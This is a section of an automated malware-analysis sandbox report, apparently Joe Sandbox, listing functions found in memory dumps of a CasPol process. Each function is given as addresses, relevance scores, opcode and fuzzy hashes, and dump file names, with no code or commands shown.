                                          • Instruction Fuzzy Hash: 92429B34A002158FDB14DBB8D464BAEBBF2AF85300F25C569D806EB395DB39DD42CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0598 Relevance: .4, Instructions: 444COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b1c4042c78f27a75ea99ab9997fa57ddaff9e39cab4e9e98a0b22156312579a
                                          • Instruction ID: 475d140ad7b558f255f27a6f3a12e9d5f5d6d9e76a577043263563d3d1dd23a6
                                          • Opcode Fuzzy Hash: 2b1c4042c78f27a75ea99ab9997fa57ddaff9e39cab4e9e98a0b22156312579a
                                          • Instruction Fuzzy Hash: DCF13A74A00215CFDB14DBB8C894B9DB7F2EF88314F258669E915EB395DA34EC42CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0B48 Relevance: .4, Instructions: 390COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 29743b676a33011c723cc5b3710dfa14dcd8e82e7c32b71fb0c62feb8d6e0bd0
                                          • Instruction ID: 8f8be4339f144f851bf01cfcba907c6dad58de61b3fca98554e4b5af25d29844
                                          • Opcode Fuzzy Hash: 29743b676a33011c723cc5b3710dfa14dcd8e82e7c32b71fb0c62feb8d6e0bd0
                                          • Instruction Fuzzy Hash: 52D18020B093859FD7529778C9547653BF19F47300F6A80EBD199DF2A7EA28DC0AC362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC1726 Relevance: .4, Instructions: 351COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa789d99cf58146af2d4dd85edfc188eff2c6da05004bb9fe5ff4bfffac3887a
                                          • Instruction ID: 025c5ab0bfd4c948a430b14756c4dd431616e6713976b60ca2b26694eef1266a
                                          • Opcode Fuzzy Hash: fa789d99cf58146af2d4dd85edfc188eff2c6da05004bb9fe5ff4bfffac3887a
                                          • Instruction Fuzzy Hash: 65C18374E001054FFF24DBA9C494FADB7B6EB8A310F29846AE815E7382DA34DD419B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC57D8 Relevance: .3, Instructions: 305COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d0f4fd124198e300a3001995a829686b7345b65b5909ef4576b63cea5d2102a
                                          • Instruction ID: e52f42194da82299db50949ad938087e1bae9c0d9350f8ca6f44bd836d4900ec
                                          • Opcode Fuzzy Hash: 3d0f4fd124198e300a3001995a829686b7345b65b5909ef4576b63cea5d2102a
                                          • Instruction Fuzzy Hash: 2FB15D71B013148FDB549B79C8947AEBBE3AF88350F1084B9E50ADB394EE35DD828B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC4878 Relevance: .3, Instructions: 298COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 817d20e4dbb3ff8dc270306c442824ebd58eee19639e573b4eb9bbf17919be42
                                          • Instruction ID: bdd04ce9e6f7c57f5e7612646c8fcf2caf134c5ac558ed8f413f34da7c9265eb
                                          • Opcode Fuzzy Hash: 817d20e4dbb3ff8dc270306c442824ebd58eee19639e573b4eb9bbf17919be42
                                          • Instruction Fuzzy Hash: 4DC11A74A002159FEB08DBB8C598B9DBBF7BF88311F158569E806E7394DA38DC42CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0014 Relevance: .3, Instructions: 282COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e694ae789ce4b244d0c2cc65c605b8646511166325148a92ddf58acdfaeb1a1
                                          • Instruction ID: 66d5531d9e09dafbd67b509eb8fa5f365ba7ccda38370c1eed1434dbb319cd32
                                          • Opcode Fuzzy Hash: 9e694ae789ce4b244d0c2cc65c605b8646511166325148a92ddf58acdfaeb1a1
                                          • Instruction Fuzzy Hash: 34B18E74A04245CFDB04DF78C894BADBBF2AF85310F2985AAD455AB391DB34EC42CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC6A88 Relevance: .3, Instructions: 277COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8153e9662594c498ea32e2d88da4d79bae80e451b43fef7e3d84171b4e8afbdf
                                          • Instruction ID: 579f18eb45c963c1003fbe86908fb386d441b5973390a39b7d68f41d23a004c8
                                          • Opcode Fuzzy Hash: 8153e9662594c498ea32e2d88da4d79bae80e451b43fef7e3d84171b4e8afbdf
                                          • Instruction Fuzzy Hash: 4A91F171B093808FDB169B74CA64B693BF29F86314F1944AAC485DF692EE39CC06C752
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0070 Relevance: .3, Instructions: 271COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d70071819bb5063eddadb924bc1c574770022d047b7e9b28fd0a62e48c6cd427
                                          • Instruction ID: c016aca0a03031fb34d835371dd9f6bf6d4b3242390a2ca9362dc37b8ea5909f
                                          • Opcode Fuzzy Hash: d70071819bb5063eddadb924bc1c574770022d047b7e9b28fd0a62e48c6cd427
                                          • Instruction Fuzzy Hash: 9BA17D71A00209CFDB04DFB8C498B6DB7F2AF84311F298669E515AB394DB35EC42CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC34C8 Relevance: .3, Instructions: 270COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b2da8339e896ab8336f5d8c8f90d7470aa97a2b7a353836de476bebe765df07
                                          • Instruction ID: 8337d72fb2f0cdc0b5858b9e7a1433c03c0c88b0aef54f98b2a4295d9f8740f6
                                          • Opcode Fuzzy Hash: 7b2da8339e896ab8336f5d8c8f90d7470aa97a2b7a353836de476bebe765df07
                                          • Instruction Fuzzy Hash: 3B9103317093909FE7029778C858B5A3BF19F8A300F1580EAD044DF796EA38DE0AC761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC6680 Relevance: .3, Instructions: 264COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 786dce146c06300538c7f8a348b423c77dc76ddb44e4f94c3be61c212f52f144
                                          • Instruction ID: 37d188cb2b452c94bd39c22ebe2fc9200b86f875cd8fbcdb41e51cb2900405eb
                                          • Opcode Fuzzy Hash: 786dce146c06300538c7f8a348b423c77dc76ddb44e4f94c3be61c212f52f144
                                          • Instruction Fuzzy Hash: 0481C430B101105BFF249BBCCA98F6E26AADB9D704F20447EE11AD7791DD78CD4197A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC66D0 Relevance: .2, Instructions: 250COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 597b53e987f272b0f6f90c8b04ad1577057126b095aaf7fc73e7189fe89dc87a
                                          • Instruction ID: 918eadd00bd94f89f33bdbdf2da714e78261672d244779db7c64612eb693e3f6
                                          • Opcode Fuzzy Hash: 597b53e987f272b0f6f90c8b04ad1577057126b095aaf7fc73e7189fe89dc87a
                                          • Instruction Fuzzy Hash: 33819030B001505BFF2497BCCA98B6E76AADB9E700F20447EE11AD7791DE78CD4197A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC5028 Relevance: .2, Instructions: 249COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fbda76b690c0ac6b1c33aed861c061015f42ffb88efb7be0f9f104d6c3b8832
                                          • Instruction ID: 8ff3db2838a7e4ed82e7f6e400fa8372e159d67ca37ffdcdb3972e0a6f2e1a9f
                                          • Opcode Fuzzy Hash: 2fbda76b690c0ac6b1c33aed861c061015f42ffb88efb7be0f9f104d6c3b8832
                                          • Instruction Fuzzy Hash: 59818075B01B148BDB14DBB9C4647AEB7F3AF84340F208529D906AB394EF74AD42CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC3D98 Relevance: .2, Instructions: 163COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e04c815fd5787b88b4177d9c8d77cab9ae1a9be1ca436b89487c2e804aaff72d
                                          • Instruction ID: 28cd4e839d2cffacf732bf6347c14390216dfd480bc5afadb3a77a950e0a7767
                                          • Opcode Fuzzy Hash: e04c815fd5787b88b4177d9c8d77cab9ae1a9be1ca436b89487c2e804aaff72d
                                          • Instruction Fuzzy Hash: 58519975E007089BDB14DFB9C85469EBBF2AF88340F24852DD906EB354EB34AD02CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC5019 Relevance: .2, Instructions: 153COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b695ab3e870ee9f3de27af0f7fc2d671f134449cf305731116caece9d03a8c29
                                          • Instruction ID: f2d84f03393d11a6b05344292f6a0a74bd3345bd7006dedb6b74abcd6172a6e7
                                          • Opcode Fuzzy Hash: b695ab3e870ee9f3de27af0f7fc2d671f134449cf305731116caece9d03a8c29
                                          • Instruction Fuzzy Hash: 44518D75E007189FDB14DFB9C85469EBBF2AF88340F148529D906AB354EB74AD06CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC621D Relevance: .1, Instructions: 143COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24092128a5b13ee1805e7f10e3a45dc6bf5e1712e3e093662730aeb0b084d163
                                          • Instruction ID: de5dd583743425717174f3e6d622da64f92e624af966b78d6846de112d42d008
                                          • Opcode Fuzzy Hash: 24092128a5b13ee1805e7f10e3a45dc6bf5e1712e3e093662730aeb0b084d163
                                          • Instruction Fuzzy Hash: 0851FA35B002249FDF04ABB8C498BAD7BF6AF89341B144469E50BDB364DE75DC428B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC5418 Relevance: .1, Instructions: 137COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f688f1b6c85e87a708ec8d1fe5339a111cbb623412e9b366e240e87b9d7bd4d4
                                          • Instruction ID: 835ecb6e58eccdc1e3e1632daac4320a5537f18a1d7aaee6cda6e39f62a6701d
                                          • Opcode Fuzzy Hash: f688f1b6c85e87a708ec8d1fe5339a111cbb623412e9b366e240e87b9d7bd4d4
                                          • Instruction Fuzzy Hash: 97415DB5F002189FDB04EFB9C49869EBBF6AF88640B104529E507E7344EF38DD028B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC4221 Relevance: .1, Instructions: 128COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b46216d1c3d57481b90bdb693c519558fe3a29d8e63b424d0ef309cec512409
                                          • Instruction ID: b32cf7bf93e95196180a2d987ba0353d4fdd835d421faaf955aeaa248f5e34b1
                                          • Opcode Fuzzy Hash: 5b46216d1c3d57481b90bdb693c519558fe3a29d8e63b424d0ef309cec512409
                                          • Instruction Fuzzy Hash: 8941A274B043049FDB45DBB884A57AE7BF29FC9310B15847AD50ADB396EE38CC068792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC2020 Relevance: .1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ff11d4795db45e94f9b6aaabdd772b1c519f59e6317b04b0a84a4a107bb014c
                                          • Instruction ID: 17511c5bb6ed4a725e3034eb62c4bf79cfaabee57c6f9834d11b5e478a01b54e
                                          • Opcode Fuzzy Hash: 7ff11d4795db45e94f9b6aaabdd772b1c519f59e6317b04b0a84a4a107bb014c
                                          • Instruction Fuzzy Hash: FD4196B5B002248FDB04AFB8C89869E7BF5BF88250B544539E607E3384DF78DD018B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0418 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd0795bd07fbb5fef8712b51495fe3c68dbf8f60ae148529019fc58b29502e3c
                                          • Instruction ID: 2c8042f09b7259e5f6c9d4429db8e97cc2307f510045e7e31a4a02f9101dca48
                                          • Opcode Fuzzy Hash: dd0795bd07fbb5fef8712b51495fe3c68dbf8f60ae148529019fc58b29502e3c
                                          • Instruction Fuzzy Hash: AB31D771B052849FCB51DB7CC454A6EBFF25F8A310B6480AED149DB341FA349D06C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0538 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca774033ef1c543597ef456be8a0823c511416444f552a8da62d48d9a4e55709
                                          • Instruction ID: 8b9d14d4846250a29650cfef3b828a69adca112ac0363620bbc65af8c7d30da6
                                          • Opcode Fuzzy Hash: ca774033ef1c543597ef456be8a0823c511416444f552a8da62d48d9a4e55709
                                          • Instruction Fuzzy Hash: 5C21D371B043649FDB119BB888546AD7BF29F8A304FA004AAD405EB355EB38DC0AC751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC5780 Relevance: .1, Instructions: 84COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 871c76c5badccc17c86f277408f52fd8e7168b3dec6667cf788ede0951f42e14
                                          • Instruction ID: 5f91dfda41ce862185946188bc64eca04dcdab9ca8e31f492dca5f9c5e47754e
                                          • Opcode Fuzzy Hash: 871c76c5badccc17c86f277408f52fd8e7168b3dec6667cf788ede0951f42e14
                                          • Instruction Fuzzy Hash: 0A210332B212149FDB518B389954BAE3BF29F84350F1440AAE509DB796EE38CD46CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC1FC0 Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f337460daa2207d390b1e5e09472d356b5393fe7f35bd698ec74bf6a30a841e
                                          • Instruction ID: 5dc8c48665db9a716ba3676496d054184e5c0a2c514770fb57b4f43a14bfcced
                                          • Opcode Fuzzy Hash: 2f337460daa2207d390b1e5e09472d356b5393fe7f35bd698ec74bf6a30a841e
                                          • Instruction Fuzzy Hash: 9E21F271B052588FDB11DB3984906AE7BF29F89300F1440BBD509EB381FA38CD0AC7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0F88 Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27501e5eec3d31af054aaa01e9835600ee2f60256571c9e7d61132528460028d
                                          • Instruction ID: 07573ad79342b290c76a9ea357a76bd68d6642149922c34a9219990e836eeb3a
                                          • Opcode Fuzzy Hash: 27501e5eec3d31af054aaa01e9835600ee2f60256571c9e7d61132528460028d
                                          • Instruction Fuzzy Hash: FF212274E04394CFDB219BB4C85878D7BB0AF41311F2045ABD546DB392EB38C88ACB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FCD39FC Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6696999493.000000001FCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fcd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f30e64d38db2f8004acb5386bcaaf0d515cce61ec64dd06cb28312f637466cc
                                          • Instruction ID: 52eb885828cbe66c61f4c60166a9aafafa7925318efcd5e516ae1996ccedca73
                                          • Opcode Fuzzy Hash: 2f30e64d38db2f8004acb5386bcaaf0d515cce61ec64dd06cb28312f637466cc
                                          • Instruction Fuzzy Hash: 6B11A7B5508341AFD340CF19D880A5BFBE4FB88664F04895EF99897311D231E9148FA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC5411 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8284e5ae7857073fe3d5a3296b9c65311ae779f0c5729b26bac3c57a6dd3f194
                                          • Instruction ID: c7a0d037051efb04e8618dff59667cb4de3bcd47c2e7d95dc6ebb9a7ecad9d1e
                                          • Opcode Fuzzy Hash: 8284e5ae7857073fe3d5a3296b9c65311ae779f0c5729b26bac3c57a6dd3f194
                                          • Instruction Fuzzy Hash: 6511A072F002484FCF04DBB944945AE7EE25FC8250B10403EE50AEB340EE388D028791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D5F2544 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0be3e0fc6f7b204790068874665c8249a43defc25867d77ad93105dca0005037
                                          • Instruction ID: 9a80e99a2945eb6a7733bc14096b070d5afdf924827f0059b5dd2ac9ef10a847
                                          • Opcode Fuzzy Hash: 0be3e0fc6f7b204790068874665c8249a43defc25867d77ad93105dca0005037
                                          • Instruction Fuzzy Hash: 2C11E471208281DFD309CB64D990B16B796EB8870CF24C99CE84D8F242C77BD813CA52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC56B1 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22a7069923e2a7d836f091b9c70f1be41a183892889f35cb5b237ab16ede5a42
                                          • Instruction ID: 916a7b243d4e61abb0442cabcc33dca7f160d7e93dd38aac55c1211862873bf6
                                          • Opcode Fuzzy Hash: 22a7069923e2a7d836f091b9c70f1be41a183892889f35cb5b237ab16ede5a42
                                          • Instruction Fuzzy Hash: 83113375F002549FCB44DBBCC494AAE7BF5AF8C650750846AE50AE7344EE34AE428BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D5F250B Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94492a150bdcc153e80378222a87ec4842ba089dfc58c42a261b6398551342c8
                                          • Instruction ID: 8ed7d524231e64e9c641a08e3f68e124f0f509d870c56c09b3d28b9d456652b7
                                          • Opcode Fuzzy Hash: 94492a150bdcc153e80378222a87ec4842ba089dfc58c42a261b6398551342c8
                                          • Instruction Fuzzy Hash: F6216F7510D3C08FC707CB20D890B15BFB1AB96218F1985EAD4898F6A3C73A8906CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0EC8 Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ff648c6cccfdb152aec831cf088649849a49b13623abfbb07f66d058699478c
                                          • Instruction ID: f452e28168bff18a0381efd19cb0edaf1102f8bf4a08bfb1af11755fdff26991
                                          • Opcode Fuzzy Hash: 6ff648c6cccfdb152aec831cf088649849a49b13623abfbb07f66d058699478c
                                          • Instruction Fuzzy Hash: 24115635F001189FCB50DBBDC48499EBBF5AB8C650760402AE50AE7344EE34AD02CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC56B8 Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c3c52f4523fb1d34d77d8bc4212809446e32030072a27eeae26e4f2319b073d
                                          • Instruction ID: e84403054fbf0b31bc7339799d69780cdd91d59359902d92398f0c582c8211f3
                                          • Opcode Fuzzy Hash: 7c3c52f4523fb1d34d77d8bc4212809446e32030072a27eeae26e4f2319b073d
                                          • Instruction Fuzzy Hash: C6115235F002189FCB40DBBDC4849AEBBF5AB8C650B508069E50AE7344EE30AE418BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0478 Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 13c44d1c82ea362290c0ad8f0de49987c481e9dc18530363d8d778ab4efbbaa9
                                          • Instruction ID: 122aab25ecc3886efa0b734e4c344f9710c8a2fddad578553d3ea48d338642e1
                                          • Opcode Fuzzy Hash: 13c44d1c82ea362290c0ad8f0de49987c481e9dc18530363d8d778ab4efbbaa9
                                          • Instruction Fuzzy Hash: 24110075F001589FCB50DBBDC4949AEBBF5AB8C660760816AD50AE7344FE34AD018BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

